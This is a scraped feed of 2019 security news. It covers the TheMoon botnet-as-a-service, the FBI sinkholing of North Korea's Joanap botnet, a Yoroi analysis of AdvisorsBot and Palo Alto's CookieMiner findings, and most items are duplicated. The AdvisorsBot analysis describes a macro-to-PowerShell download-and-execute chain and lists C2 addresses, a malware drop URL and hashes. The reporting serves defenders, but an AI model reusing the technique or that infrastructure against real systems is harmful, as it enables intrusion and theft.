Just because an app is available on Google Play Store doesn't mean that it is a legitimate app. Despite so many efforts by Google, some fake and malicious apps do sneak in and land millions of unaware users on the hunting ground of scammers and hackers. Cybersecurity firm Trend Micro uncovered at least 29 devious photo apps that managed to make its way onto Google Play Store and have been

Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a persons audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacys Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employeesdata
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Koreas Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a persons audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacys Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employeesdata
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Koreas Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs: Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution for the TheMoon IoT botnet, operators added a previously undocumented module that allows them to offer it with a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.
The botnet target broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs collected evidence that botnet actor has sold this proxy botnet as a service to other cybercrime gangs that were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then they uncovered a C2 operating at 91[.]215[.] 158[.]118. This address was associated with previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests by 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by
CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.



Security Affairs

Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution for the TheMoon IoT botnet, operators added a previously undocumented module that allows them to offer it with a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.
The botnet target broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs collected evidence that botnet actor has sold this proxy botnet as a service to other cybercrime gangs that were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then they uncovered a C2 operating at 91[.]215[.] 158[.]118. This address was associated with previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests by 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by
CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.

Security Affairs: US authorities aim to dismantle North Korea’s Joanap Botnet

FBI and Air Force experts are sinkholing the Joanap botnet to collect information about it and dismantle the malicious infrastrcuture.

The U.S. Justice Department declares war to the Joanap Botnet that is associated with North Korea. 

The U.S. DoJ announced this week that it is working to dismantle the infamous Joanap botnet, a malicious infrastructure that is believed to be associated to Pyongyang.

The FBI and the U.S. Air Force Office of Special Investigations (AFOSI) obtained court orders and search warrants that allow them to conduct sinkholing of the Joanap botnet.

The Joanap bot is a remote access trojan (RAT) that allows the attackers to exfiltrate data from compromised systems, it supports many commands and is also able to drop additional payloads.

The authorities set up servers that mimic the botnet’s communication system in order to collect information on infected systems and share them with ISP and the owners of the compromised computers.

The U.S. authorities will also inform foreign victims through the FBI’s Legal Attaches that works with the law enforcement and security agencies in their countries.

The Joanap botnet has been around since 2009, experts pointed out that the threat is still spreading through unpatched systems and unprotected networks. The bot is delivered by using the Brambul SMB worm that is able to spreads through a network by brute-forcing SMB shares leveraging on a list of hard-coded credentials.

Experts linked both the Joanap and Brambul malware to the North Korea-linked Hidden Cobra APT group.

The Joanap bot infected systems in many industries, including media, aerospace, financial, and critical infrastructure sectors across the world.

“Computers around the world remain infected by a botnet associated with the North Korean Regime,” said Assistant Attorney General John Demers. “Through this operation, we are working to eradicate the threat that North Korea state hackers pose to the confidentiality, integrity, and availability of data. This operation is another example of the Justice Department’s efforts to use every tool at our disposal to disrupt national security threat actors, including, but by no means limited to, prosecution.”

“Through technical means and legal process, the FBI continually seeks to disrupt the malicious cyber activities of North Korean cybercriminals, as in this case, and all cyber actors who pose a threat to the United States and our international partners.” explained ADIC Paul Delacourt,

In June 2018, the FBI filed a complaint against the North Korean citizen Park Jin Hyok, an expert that works for North Korean military intelligence agency Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group, according to the authorities it was involved in numerous computer intrusions in which he had used also the Brambul malware to gain unauthorized access to computers.

“Moreover, a complaint was filed on June 8, 2018, charging Park Jin Hyok with a conspiracy to carry out numerous computer intrusions backed by the North Korean government.  That complaint alleged how co-conspirators used Brambul to gain unauthorized access to computers, and then used those computers to carry out the charged malicious cyber activities.  The Brambul worm itself was recovered from the computer networks of some victims of the conspiracy. “

The good news for users is that the Joanap is not effective against updated Microsoft Windows systems running Windows Defender and using Windows Update. Most of the antivirus programs are also able to detect both Joanap and Brambul.

Pierluigi Paganini

(SecurityAffairs – Joanap botnet, North Korea)

The post US authorities aim to dismantle North Korea’s Joanap Botnet appeared first on Security Affairs.



Security Affairs

US authorities aim to dismantle North Korea’s Joanap Botnet

FBI and Air Force experts are sinkholing the Joanap botnet to collect information about it and dismantle the malicious infrastrcuture.

The U.S. Justice Department declares war to the Joanap Botnet that is associated with North Korea. 

The U.S. DoJ announced this week that it is working to dismantle the infamous Joanap botnet, a malicious infrastructure that is believed to be associated to Pyongyang.

The FBI and the U.S. Air Force Office of Special Investigations (AFOSI) obtained court orders and search warrants that allow them to conduct sinkholing of the Joanap botnet.

The Joanap bot is a remote access trojan (RAT) that allows the attackers to exfiltrate data from compromised systems, it supports many commands and is also able to drop additional payloads.

The authorities set up servers that mimic the botnet’s communication system in order to collect information on infected systems and share them with ISP and the owners of the compromised computers.

The U.S. authorities will also inform foreign victims through the FBI’s Legal Attaches that works with the law enforcement and security agencies in their countries.

The Joanap botnet has been around since 2009, experts pointed out that the threat is still spreading through unpatched systems and unprotected networks. The bot is delivered by using the Brambul SMB worm that is able to spreads through a network by brute-forcing SMB shares leveraging on a list of hard-coded credentials.

Experts linked both the Joanap and Brambul malware to the North Korea-linked Hidden Cobra APT group.

The Joanap bot infected systems in many industries, including media, aerospace, financial, and critical infrastructure sectors across the world.

“Computers around the world remain infected by a botnet associated with the North Korean Regime,” said Assistant Attorney General John Demers. “Through this operation, we are working to eradicate the threat that North Korea state hackers pose to the confidentiality, integrity, and availability of data. This operation is another example of the Justice Department’s efforts to use every tool at our disposal to disrupt national security threat actors, including, but by no means limited to, prosecution.”

“Through technical means and legal process, the FBI continually seeks to disrupt the malicious cyber activities of North Korean cybercriminals, as in this case, and all cyber actors who pose a threat to the United States and our international partners.” explained ADIC Paul Delacourt,

In June 2018, the FBI filed a complaint against the North Korean citizen Park Jin Hyok, an expert that works for North Korean military intelligence agency Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group, according to the authorities it was involved in numerous computer intrusions in which he had used also the Brambul malware to gain unauthorized access to computers.

“Moreover, a complaint was filed on June 8, 2018, charging Park Jin Hyok with a conspiracy to carry out numerous computer intrusions backed by the North Korean government.  That complaint alleged how co-conspirators used Brambul to gain unauthorized access to computers, and then used those computers to carry out the charged malicious cyber activities.  The Brambul worm itself was recovered from the computer networks of some victims of the conspiracy. “

The good news for users is that the Joanap is not effective against updated Microsoft Windows systems running Windows Defender and using Windows Update. Most of the antivirus programs are also able to detect both Joanap and Brambul.

Pierluigi Paganini

(SecurityAffairs – Joanap botnet, North Korea)

The post US authorities aim to dismantle North Korea’s Joanap Botnet appeared first on Security Affairs.

Security Affairs: The return of the AdvisorsBot malware

Security experts at Cybaze– Yoroi ZLab have analyzed a new sample of the AdvisorsBot malware, a downloader that was first spotted in August 2018.

As usual, the malware looks like a legitimate e-mail attachment, named as “invoice.doc”. Today, weaponized Microsoft office documents with macros, are one of the most common and more effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users to enable them. 

The following figure shown a workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

HashSha 256:a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
ThreatDropper
Briefinvoice(7).doc
ssdeep3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 –   Dropper information

HashSha 256:62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threatpowershell script
Briefokzjtag.png (dropper/payload)
ssdeep192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, powershell script information

Once opened, the document kindly asks to the users to enable the macro scripts, heavily obfuscated to avoid static detection. 

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the powershell console, then it saves it with .png file extension and run it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection

This script contains different base64 encoded chunks of data, as show in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the ip of the C2. This address is the same used to download the whole script. 

Figure 5 – Deobfuscated C2’s IP

The second piece of script labeled with “$jdH9C” is a compressed GzipStream object. After its decoding we noticed an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”). 

The latest base64 chunk is directly executed through “iex” primitive. It’s interesting to notice it calls some “non-library” functions; functions loaded from the previously referenced dll file.

Within this script, we noticed a routine named “nvtTvqn” able to gather information about victim machine. 

Figure 7 – System information stealed by malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Other interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all email accounts registered on victim machine. Inside its code another routine named “CR1Z” is references, this one is able to verify the presence of Outlook client installed.

Figure 9 – Register key searched by malware

DLL Analysis

As described in the previous paragraph, the powershell script uses exported function from the executable. 

HashSha 256:5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
ThreatMalware payload containing some malicious function invoked by Powershell script
Brief*.dll file (Payload)
ssdeep96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic linked library not already known to major security platforms.

Figure 10 – DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes: for instance to generate pseudo-random installation path.

Figure 12 – Source code of function in DLL

Instead, the “kaYchi” function accepts three parameters, id, status and post, and creates files with two different extensions: “*.asp” if “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at time of writing. After described steps, malware try to download other components from it and execute them with “iex” primitive

Last DNS activity was in December 2018. This IP is already know at scientific community and labeled as malicious. The IP is located in US how visible in the following figures. 

Figure 14 – previous DNS of C2
Figure 15 – C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018 we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018

Figure 16 – zosmogroel.com certificate

This signature was associated with more than 80 IP addresses, further analysis reveals that those ips reveal how some of them have been used as dropurls for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018, we also found evidence on a public sandbox that the 162.244.32.180 remote C2 on last August deliver a Ursnif/Gozi Variant 162.244.32.180/yak0810.exe with the following sha256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48

as also confirmed by signatures on VT. This last evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today malware landscape, at the second place we found the abusing of Microsoft DDE protocol  with CVE-2017-11882. One reason is that, very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit  and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive utilization of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry.

Several APT’s today  are using spear-phishing mail with weaponized office document as an attachment, just to name few ones OilRIG APT have used BondUpdated in a campaign discovered by Fireeye in 2017 targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell. 

Similar vector was used in recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload.

This sample show an high level of obfuscation to defeat AV and does not use any exploit, in fact, the obfuscated DLL component was not flagged by VT(0/60) at the time of writing. Unfortunately we can not carry on the analysis because the C2 is not reachable yet, but we noticed that last DNS activity was in December 2018 with the registration of 2 distinct domains active for 1 week each one (and several domains before), assuming that, this malware was developed to be used in target-specific activities tightening the time window to a minimum each time. Further analysis on these registered domains suggest us that the whole infrastructure used is big enough (88 IP’s founded) and it may have also been used to deliver other malware.

Researcher of Cybaze-Yoroi ZLAB advice to disable macros by default and check the origin of the email in depth

Further details, including IoCs and Yara rules, are reported in the analysis published

https://blog.yoroi.company/research/the-return-of-advisorsbot/

Pierluigi Paganini

(SecurityAffairs – AdvisorsBot, malware)

The post The return of the AdvisorsBot malware appeared first on Security Affairs.



Security Affairs

The return of the AdvisorsBot malware

Security experts at Cybaze– Yoroi ZLab have analyzed a new sample of the AdvisorsBot malware, a downloader that was first spotted in August 2018.

As usual, the malware looks like a legitimate e-mail attachment, named as “invoice.doc”. Today, weaponized Microsoft office documents with macros, are one of the most common and more effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users to enable them. 

The following figure shown a workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

HashSha 256:a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
ThreatDropper
Briefinvoice(7).doc
ssdeep3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 –   Dropper information

HashSha 256:62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threatpowershell script
Briefokzjtag.png (dropper/payload)
ssdeep192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, powershell script information

Once opened, the document kindly asks to the users to enable the macro scripts, heavily obfuscated to avoid static detection. 

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the powershell console, then it saves it with .png file extension and run it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection

This script contains different base64 encoded chunks of data, as show in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the ip of the C2. This address is the same used to download the whole script. 

Figure 5 – Deobfuscated C2’s IP

The second piece of script labeled with “$jdH9C” is a compressed GzipStream object. After its decoding we noticed an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”). 

The latest base64 chunk is directly executed through “iex” primitive. It’s interesting to notice it calls some “non-library” functions; functions loaded from the previously referenced dll file.

Within this script, we noticed a routine named “nvtTvqn” able to gather information about victim machine. 

Figure 7 – System information stealed by malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Other interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all email accounts registered on victim machine. Inside its code another routine named “CR1Z” is references, this one is able to verify the presence of Outlook client installed.

Figure 9 – Register key searched by malware

DLL Analysis

As described in the previous paragraph, the powershell script uses exported function from the executable. 

HashSha 256:5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
ThreatMalware payload containing some malicious function invoked by Powershell script
Brief*.dll file (Payload)
ssdeep96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic linked library not already known to major security platforms.

Figure 10 – DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes: for instance to generate pseudo-random installation path.

Figure 12 – Source code of function in DLL

Instead, the “kaYchi” function accepts three parameters, id, status and post, and creates files with two different extensions: “*.asp” if “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at time of writing. After described steps, malware try to download other components from it and execute them with “iex” primitive

Last DNS activity was in December 2018. This IP is already know at scientific community and labeled as malicious. The IP is located in US how visible in the following figures. 

Figure 14 – previous DNS of C2
Figure 15 – C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018 we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018

Figure 16 – zosmogroel.com certificate

This signature was associated with more than 80 IP addresses, further analysis reveals that those ips reveal how some of them have been used as dropurls for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018, we also found evidence on a public sandbox that the 162.244.32.180 remote C2 on last August deliver a Ursnif/Gozi Variant 162.244.32.180/yak0810.exe with the following sha256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48

as also confirmed by signatures on VT. This last evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today malware landscape, at the second place we found the abusing of Microsoft DDE protocol  with CVE-2017-11882. One reason is that, very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit  and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive utilization of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry.

Several APT’s today  are using spear-phishing mail with weaponized office document as an attachment, just to name few ones OilRIG APT have used BondUpdated in a campaign discovered by Fireeye in 2017 targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell. 

Similar vector was used in recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload.

This sample show an high level of obfuscation to defeat AV and does not use any exploit, in fact, the obfuscated DLL component was not flagged by VT(0/60) at the time of writing. Unfortunately we can not carry on the analysis because the C2 is not reachable yet, but we noticed that last DNS activity was in December 2018 with the registration of 2 distinct domains active for 1 week each one (and several domains before), assuming that, this malware was developed to be used in target-specific activities tightening the time window to a minimum each time. Further analysis on these registered domains suggest us that the whole infrastructure used is big enough (88 IP’s founded) and it may have also been used to deliver other malware.

Researcher of Cybaze-Yoroi ZLAB advice to disable macros by default and check the origin of the email in depth

Further details, including IoCs and Yara rules, are reported in the analysis published

https://blog.yoroi.company/research/the-return-of-advisorsbot/

Pierluigi Paganini

(SecurityAffairs – AdvisorsBot, malware)

The post The return of the AdvisorsBot malware appeared first on Security Affairs.

Hackers used Karma tool to hack iPhones of prominent Govt officials

By Uzair Amir

UAE Launched Aggressive Cyber Espionage Campaign using KARMA and Expertise of Ex-NSA Operatives. Though it seems hard to believe it is indeed true that the smartphones of several prominent political and governmental personalities worldwide have been hacked by former US intelligence officers who now work for the UAE (United Arab Emirates) government. Prominent figures targeted […]

This is a post from HackRead.com Read the original post: Hackers used Karma tool to hack iPhones of prominent Govt officials

New Mac Malware Targets Cookies to Steal From Cryptocurrency Wallets

Mac users need to beware of a newly discovered piece of malware that steals their web browser cookies and credentials in an attempt to withdraw funds from their cryptocurrency exchange accounts. Dubbed CookieMiner due to its capability of stealing cookies-related to cryptocurrency exchanges, the malware has specifically been designed to target Mac users and is believed to be based on

Matrix Ransomware: A Threat to Low-Hanging Fruit

In its 2019 Threat Report, Sophos predicted a rise in targeted ransomware attacks. According to new research, Matrix, a copycat targeted ransomware that is flying under the radar, is one such threat that

The post Matrix Ransomware: A Threat to Low-Hanging Fruit appeared first on The Cyber Security Place.

Cisco Router Vulnerability Gives Window into Researchers’ World

In late January, researchers found a vulnerability in Cisco RV320 and RV325 routers — routers aimed at the needs of small businesses and remote offices. Cisco quickly released a software

The post Cisco Router Vulnerability Gives Window into Researchers’ World appeared first on The Cyber Security Place.

New Mac Malware steals iPhone text messages from iTunes backups

By Waqas

The IT security researchers at Palo Alto Networks’ Unit 42 have discovered a dangerous new Mac malware capable of targeting devices for multi-purposes including stealing cryptocurrency. Dubbed CookieMiner by researchers; the Mac malware is a variant of OSX.DarthMiner, another nasty piece of malware known for targeting MacOS. But, CookieMiner aims at much more than its predecessor. See: 400% increase in […]

This is a post from HackRead.com Read the original post: New Mac Malware steals iPhone text messages from iTunes backups

Security Affairs: CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coinmining software that appears like an XMRIG-type miner, but that mines Koto, a lesser popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages on the EmPyre backdoor as a post-exploitation agent, it checks if the Little Snitch firewall is running on the target host and aborts installation if it does.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage,”

Further details, including IoCs, are reported in the analysis published by PaloAlto networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.



Security Affairs

CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coinmining software that appears like an XMRIG-type miner, but that mines Koto, a lesser popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages on the EmPyre backdoor as a post-exploitation agent, it checks if the Little Snitch firewall is running on the target host and aborts installation if it does.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

